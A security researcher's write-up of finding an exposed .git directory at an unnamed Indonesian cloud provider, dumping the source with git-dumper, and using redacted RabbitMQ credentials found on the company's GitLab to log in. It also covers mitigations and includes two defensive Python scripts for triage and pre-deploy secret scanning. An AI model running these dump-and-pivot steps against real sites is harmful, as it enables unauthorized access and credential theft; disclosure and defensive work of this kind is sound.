Hello everyone,
In this post, I will show you how I “accidentally” discovered a vulnerability at one of Indonesia’s cloud provider companies that could lead to information disclosure, including hardcoded credentials. No sophisticated tool was involved: I only used the Chrome browser and an extension called DotGit (an extension that checks whether a .git directory is exposed on the websites you visit).
Who is the target?
The target asked me not to disclose the company name, so let’s call it Company X; it is one of Indonesia’s cloud provider companies.
Reconnaissance
Actually, I wasn’t doing any bug hunting at the time; I was looking for a hosting solution to host the PoC (Proof of Concept) scripts for my other reports in the cloud. While browsing Company X’s site and opening their hosting solution at one of their subdomains, https://subdomain.REDACTED.com/, my Chrome browser suddenly popped up a notification that a .git directory was exposed.
DotGit found an exposed .git
To prove that the .git/ directory is accessible is quite easy: we can use the curl command:
$ curl https://REDACTED.com/.git/config
[fetch]
	recurseSubmodules = false
[http "https://gitlab.REDACTED.com"]
	sslCAInfo = /home/gitlab-runner/builds/b8dc6653/0/dev/REDACTED.tmp/CI_SERVER_TLS_CA_FILE
[core]
	repositoryformatversion = 0
	filemode = true
	bare = false
	logallrefupdates = true
[remote "origin"]
	url = https://gitlab-ci-token:REDACTED.REDACTED.com/dev/REDACTED.git
	fetch = +refs/heads/*:refs/remotes/origin/*
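Even without dumping the repository, a .git/config like the one above tells a responder what the exposure handed out: the internal GitLab host, the CI runner path the site was deployed from, and a remote URL whose userinfo part starts with gitlab-ci-token (git stores such URLs as user:token@host). The Python below is an added example, not code from this post or from Company X, that parses a config of that shape and lists what must be rotated or reviewed; the host names, runner path and token in the sample are constructed placeholders standing in for the redacted values.

```python
import re
from urllib.parse import urlsplit

# Constructed sample modelled on the shape of the exposed .git/config in the
# post; host names, the runner path and the token are placeholders, not the
# real (redacted) values.
SAMPLE_GIT_CONFIG = """\
[fetch]
\trecurseSubmodules = false
[http "https://gitlab.example.internal"]
\tsslCAInfo = /home/gitlab-runner/builds/0000aaaa/0/dev/app.tmp/CI_SERVER_TLS_CA_FILE
[core]
\trepositoryformatversion = 0
\tfilemode = true
\tbare = false
\tlogallrefupdates = true
[remote "origin"]
\turl = https://gitlab-ci-token:EXAMPLE_TOKEN_VALUE@gitlab.example.internal/dev/app.git
\tfetch = +refs/heads/*:refs/remotes/origin/*
"""

_SECTION_RE = re.compile(r'^\[(?P<name>[^\s\]"]+)(?:\s+"(?P<sub>[^"]*)")?\]\s*$')
_KEY_RE = re.compile(r'^\s*(?P<key>[^=\s]+)\s*=\s*(?P<value>.*?)\s*$')


def parse_git_config(text):
    """Parse git's INI-like config into {"section.subsection.key": value}.

    Hand-rolled rather than configparser: subsection names are case-sensitive,
    may be URLs, and git writes exactly one key per line, so two regexes are
    both shorter and more predictable here.
    """
    entries = {}
    section = None
    for line in text.splitlines():
        stripped = line.strip()
        if not stripped or stripped.startswith(("#", ";")):
            continue
        m = _SECTION_RE.match(stripped)
        if m:
            section = m.group("name")
            if m.group("sub") is not None:
                section += "." + m.group("sub")
            continue
        m = _KEY_RE.match(line)
        if m and section is not None:
            entries[f"{section}.{m.group('key')}"] = m.group("value")
    return entries


def triage_exposed_config(text):
    """Summarise what a leaked .git/config reveals, for the responder.

    Returns the remote hosts referenced, any credential embedded in a remote
    URL (user name only; the secret itself is never copied into the report)
    and paths showing the checkout came from a CI runner: the items that need
    rotation or review after the exposure.
    """
    report = {"remote_hosts": [], "embedded_credentials": [], "ci_runner_paths": []}
    for key, value in parse_git_config(text).items():
        parts = key.split(".")
        if parts[0] == "remote" and parts[-1] == "url":
            u = urlsplit(value)
            if u.hostname:
                report["remote_hosts"].append(u.hostname)
            if u.username is not None:
                report["embedded_credentials"].append({
                    "remote": parts[1],
                    "username": u.username,
                    "secret_present": u.password is not None,
                })
        elif "gitlab-runner/builds/" in value:
            report["ci_runner_paths"].append(value)
    return report


if __name__ == "__main__":
    for item, found in triage_exposed_config(SAMPLE_GIT_CONFIG).items():
        print(f"{item}: {found}")
```

The report deliberately records only that a secret is present in the URL, never its value, so it can be pasted into a ticket; the token itself belongs in the rotation request, not in the report.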
Steps To Reproduce
To get the complete source code, we can use tools such as git-dumper.
[1] Install the git-dumper tool
[2] Run the following command to download the source code:
$ git-dumper https://REDACTED.com/.git output/
[-] Testing https://REDACTED.com/.git/HEAD [200]
[-] Testing https://REDACTED.com/.git/ [301]
[-] Fetching common files
[-] Fetching https://REDACTED.com/.git/COMMIT_EDITMSG [404]
[-] https://REDACTED.com/.git/COMMIT_EDITMSG responded with status code 404
[-] Fetching https://REDACTED.com/.git/description [404]
[-] Fetching https://REDACTED.com/.gitignore [404]
[-] https://REDACTED.com/.gitignore responded with status code 404
[-] https://REDACTED.com/.git/description responded with status code 404
…
[-] Finding refs/
[-] Fetching https://REDACTED.com/.git/HEAD [200]
[-] Fetching https://REDACTED.com/.git/ORIG_HEAD [404]
[-] Fetching https://REDACTED.com/.git/FETCH_HEAD [200]
[-] https://REDACTED.com/.git/ORIG_HEAD responded with status code 404
[-] Fetching https://REDACTED.com/.git/logs/refs/heads/master [404]
[-] https://REDACTED.com/.git/logs/refs/heads/master responded with status code 404
[-] Fetching https://REDACTED.com/.git/logs/refs/stash [404]
[-] https://REDACTED.com/.git/logs/refs/stash responded with status code 404
[-] Fetching https://REDACTED.com/.git/logs/refs/remotes/origin/master [200]
[-] Fetching https://REDACTED.com/.git/logs/HEAD [200]
…
[-] Fetching https://REDACTED.com/.git/objects/5d/9e30841d5e824ea6f73eb28b9a545253de829e [404]
[-] Fetching https://REDACTED.com/.git/objects/33/07be62f91262e602f6efa4927c0937208bcd13 [404]
[-] https://REDACTED.com/.git/objects/33/07be62f91262e602f6efa4927c0937208bcd13 responded with status code 404
[-] https://REDACTED.com/.git/objects/5d/9e30841d5e824ea6f73eb28b9a545253de829e responded with status code 404
[-] Fetching https://REDACTED.com/.git/objects/95/7188f1abdb63b7bd22c402f0c709774a945d08 [404]
[-] https://REDACTED.com/.git/objects/95/7188f1abdb63b7bd22c402f0c709774a945d08 responded with status code 404
[-] Running git checkout .
[3] To ensure the downloaded .git folder is valid, we can run the git log command.
$ cd output/
$ git log
commit 987fa867dc39aba5afe11801040967d31a6ece77 (HEAD, origin/master)
Author: REDACTED <REDACTED@REDACTED.co.id>
Date:   Tue Mar 2 14:21:53 2021 +0700

    style: add meta tag og and twitter
[4] Next, we can see the structure of the source code that has been downloaded using the tree command.
$ tree
.
├── assets
│   ├── css
│   ├── img
│   │   ├── fitur
│   │   ├── harga
│   │   ├── header
│   │   │   └── icon-bg
│   │   ├── ikhtisar
│   │   └── kh-white-bg.png
│   ├── js
│   └── sass
│       ├── base
│       ├── components
│       ├── elements
│       ├── form
│       ├── grid
│       ├── helpers
│       ├── layout
│       └── utilities
└── index.html
Post Exploitation
Next, I explored the GitLab address listed in the .git/config file, namely https://gitlab.REDACTED.com/.
[1] To see the projects, we can open https://gitlab.REDACTED.com/explore/projects.
[2] I found leaked credentials in the following file: https://gitlab.REDACTED.com/user/ck-rmq/-/blob/5a0aba8d59ea2c3a2127f9d49e05026772a54d3c/config.php
<?php
define("RABBITMQ_HOST", "stage.REDACTED.com");
define("RABBITMQ_PORT", 5672);
define("RABBITMQ_USERNAME", "REDACTED");
define("RABBITMQ_PASSWORD", "REDACTED");
[3] To prove that the credentials were valid, I opened the RabbitMQ web management page at http://stage.REDACTED.com:15672/ and, after entering the credentials listed above, I was logged into the system.
I decided to log out without exploring further and immediately reported this security issue to Company X.
Impact
Leaked source code makes a company more vulnerable to cyber-attacks and data breaches, since attackers can use it to steal important data or damage company systems. In this case, the exposed .git/config alone pointed at the company’s internal GitLab instance, and a repository there held working RabbitMQ credentials.
Mitigation
1. Exclude the .git/ directory when deploying to the production server. If shipping it is a business requirement, implement an access control mechanism that blocks public access to the .git/ directory.
2. Make sure that no credentials are pushed to the Git repository, and revoke all credentials that have previously been exposed.
Company X decided to restrict access to the .git/ directory by returning 403 Forbidden instead.
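One way to enforce both mitigation points before anything reaches the production server is a pre-deploy check in the CI pipeline that refuses the build artifact if it still contains .git metadata, or if any file gives a literal value to a password-, secret- or token-like constant such as the RABBITMQ_PASSWORD define() above. The Python below is an added example, not Company X’s or the post’s code; the sample build directory it constructs, including its placeholder password and the hardened getenv() variant, exists only to exercise the check.

```python
import re
import tempfile
from pathlib import Path

# Constant or variable names that must never carry a literal value in code
# that is committed or deployed.
SECRET_NAME_RE = re.compile(r"PASSWORD|PASSWD|SECRET|TOKEN|API_KEY|PRIVATE_KEY", re.IGNORECASE)

# PHP define("NAME", "literal") and NAME = "literal" / $name = 'literal'.
# A value that is not a quoted literal (e.g. getenv("...")) does not match,
# so reading the secret from the environment passes the check.
_DEFINE_RE = re.compile(r'define\(\s*["\'](?P<name>\w+)["\']\s*,\s*(?P<value>"[^"]*"|\'[^\']*\')\s*\)')
_ASSIGN_RE = re.compile(r'(?P<name>\$?\w+)\s*=\s*(?P<value>"[^"]*"|\'[^\']*\')')


def find_git_metadata(root):
    """Relative paths of every .git directory or file (submodule gitlink) under root."""
    root = Path(root)
    return sorted(p.relative_to(root).as_posix() for p in root.rglob(".git"))


def find_hardcoded_secrets(root):
    """Return [(relative path, line number, name)] for secret-like names given a literal value."""
    root = Path(root)
    findings = []
    for path in sorted(root.rglob("*")):
        if not path.is_file() or ".git" in path.parts:
            continue
        data = path.read_bytes()
        if b"\x00" in data:  # skip binaries such as images
            continue
        for lineno, line in enumerate(data.decode("utf-8", errors="replace").splitlines(), 1):
            for m in (*_DEFINE_RE.finditer(line), *_ASSIGN_RE.finditer(line)):
                name = m.group("name").lstrip("$")
                literal = m.group("value")[1:-1]
                if SECRET_NAME_RE.search(name) and literal.strip():
                    findings.append((path.relative_to(root).as_posix(), lineno, name))
    return findings


def preflight(root):
    """Gate a build artifact: returns (ok, problems). Deploy only when ok is True."""
    problems = [f"git metadata present: {p}" for p in find_git_metadata(root)]
    problems += [f"hardcoded secret {name} at {path}:{lineno}"
                 for path, lineno, name in find_hardcoded_secrets(root)]
    return not problems, problems


def build_sample_artifact(with_mistakes=True):
    """Constructed build directory; with_mistakes=True reproduces both errors from the post.

    All values are placeholders, not the redacted originals.
    """
    root = Path(tempfile.mkdtemp(prefix="artifact-"))
    (root / "index.html").write_text("<html><body>hello</body></html>\n")
    # Hardened form: same constant, value taken from the environment at runtime.
    (root / "config_ok.php").write_text(
        '<?php\n'
        'define("RABBITMQ_PASSWORD", getenv("RABBITMQ_PASSWORD"));\n'
    )
    if with_mistakes:
        (root / ".git").mkdir()
        (root / ".git" / "HEAD").write_text("ref: refs/heads/master\n")
        (root / "config.php").write_text(
            '<?php\n'
            'define("RABBITMQ_HOST", "stage.example.internal");\n'
            'define("RABBITMQ_PORT", 5672);\n'
            'define("RABBITMQ_USERNAME", "app");\n'
            'define("RABBITMQ_PASSWORD", "EXAMPLE_PLACEHOLDER_PASSWORD");\n'
        )
    return root


if __name__ == "__main__":
    ok, problems = preflight(build_sample_artifact())
    print("deploy allowed" if ok else "deploy blocked:")
    for p in problems:
        print("  -", p)
```

Run as a CI job against the directory that is about to be uploaded, failing the job when preflight() returns False; the .git check also catches the gitlink file a submodule leaves behind, which a directory-only test would miss.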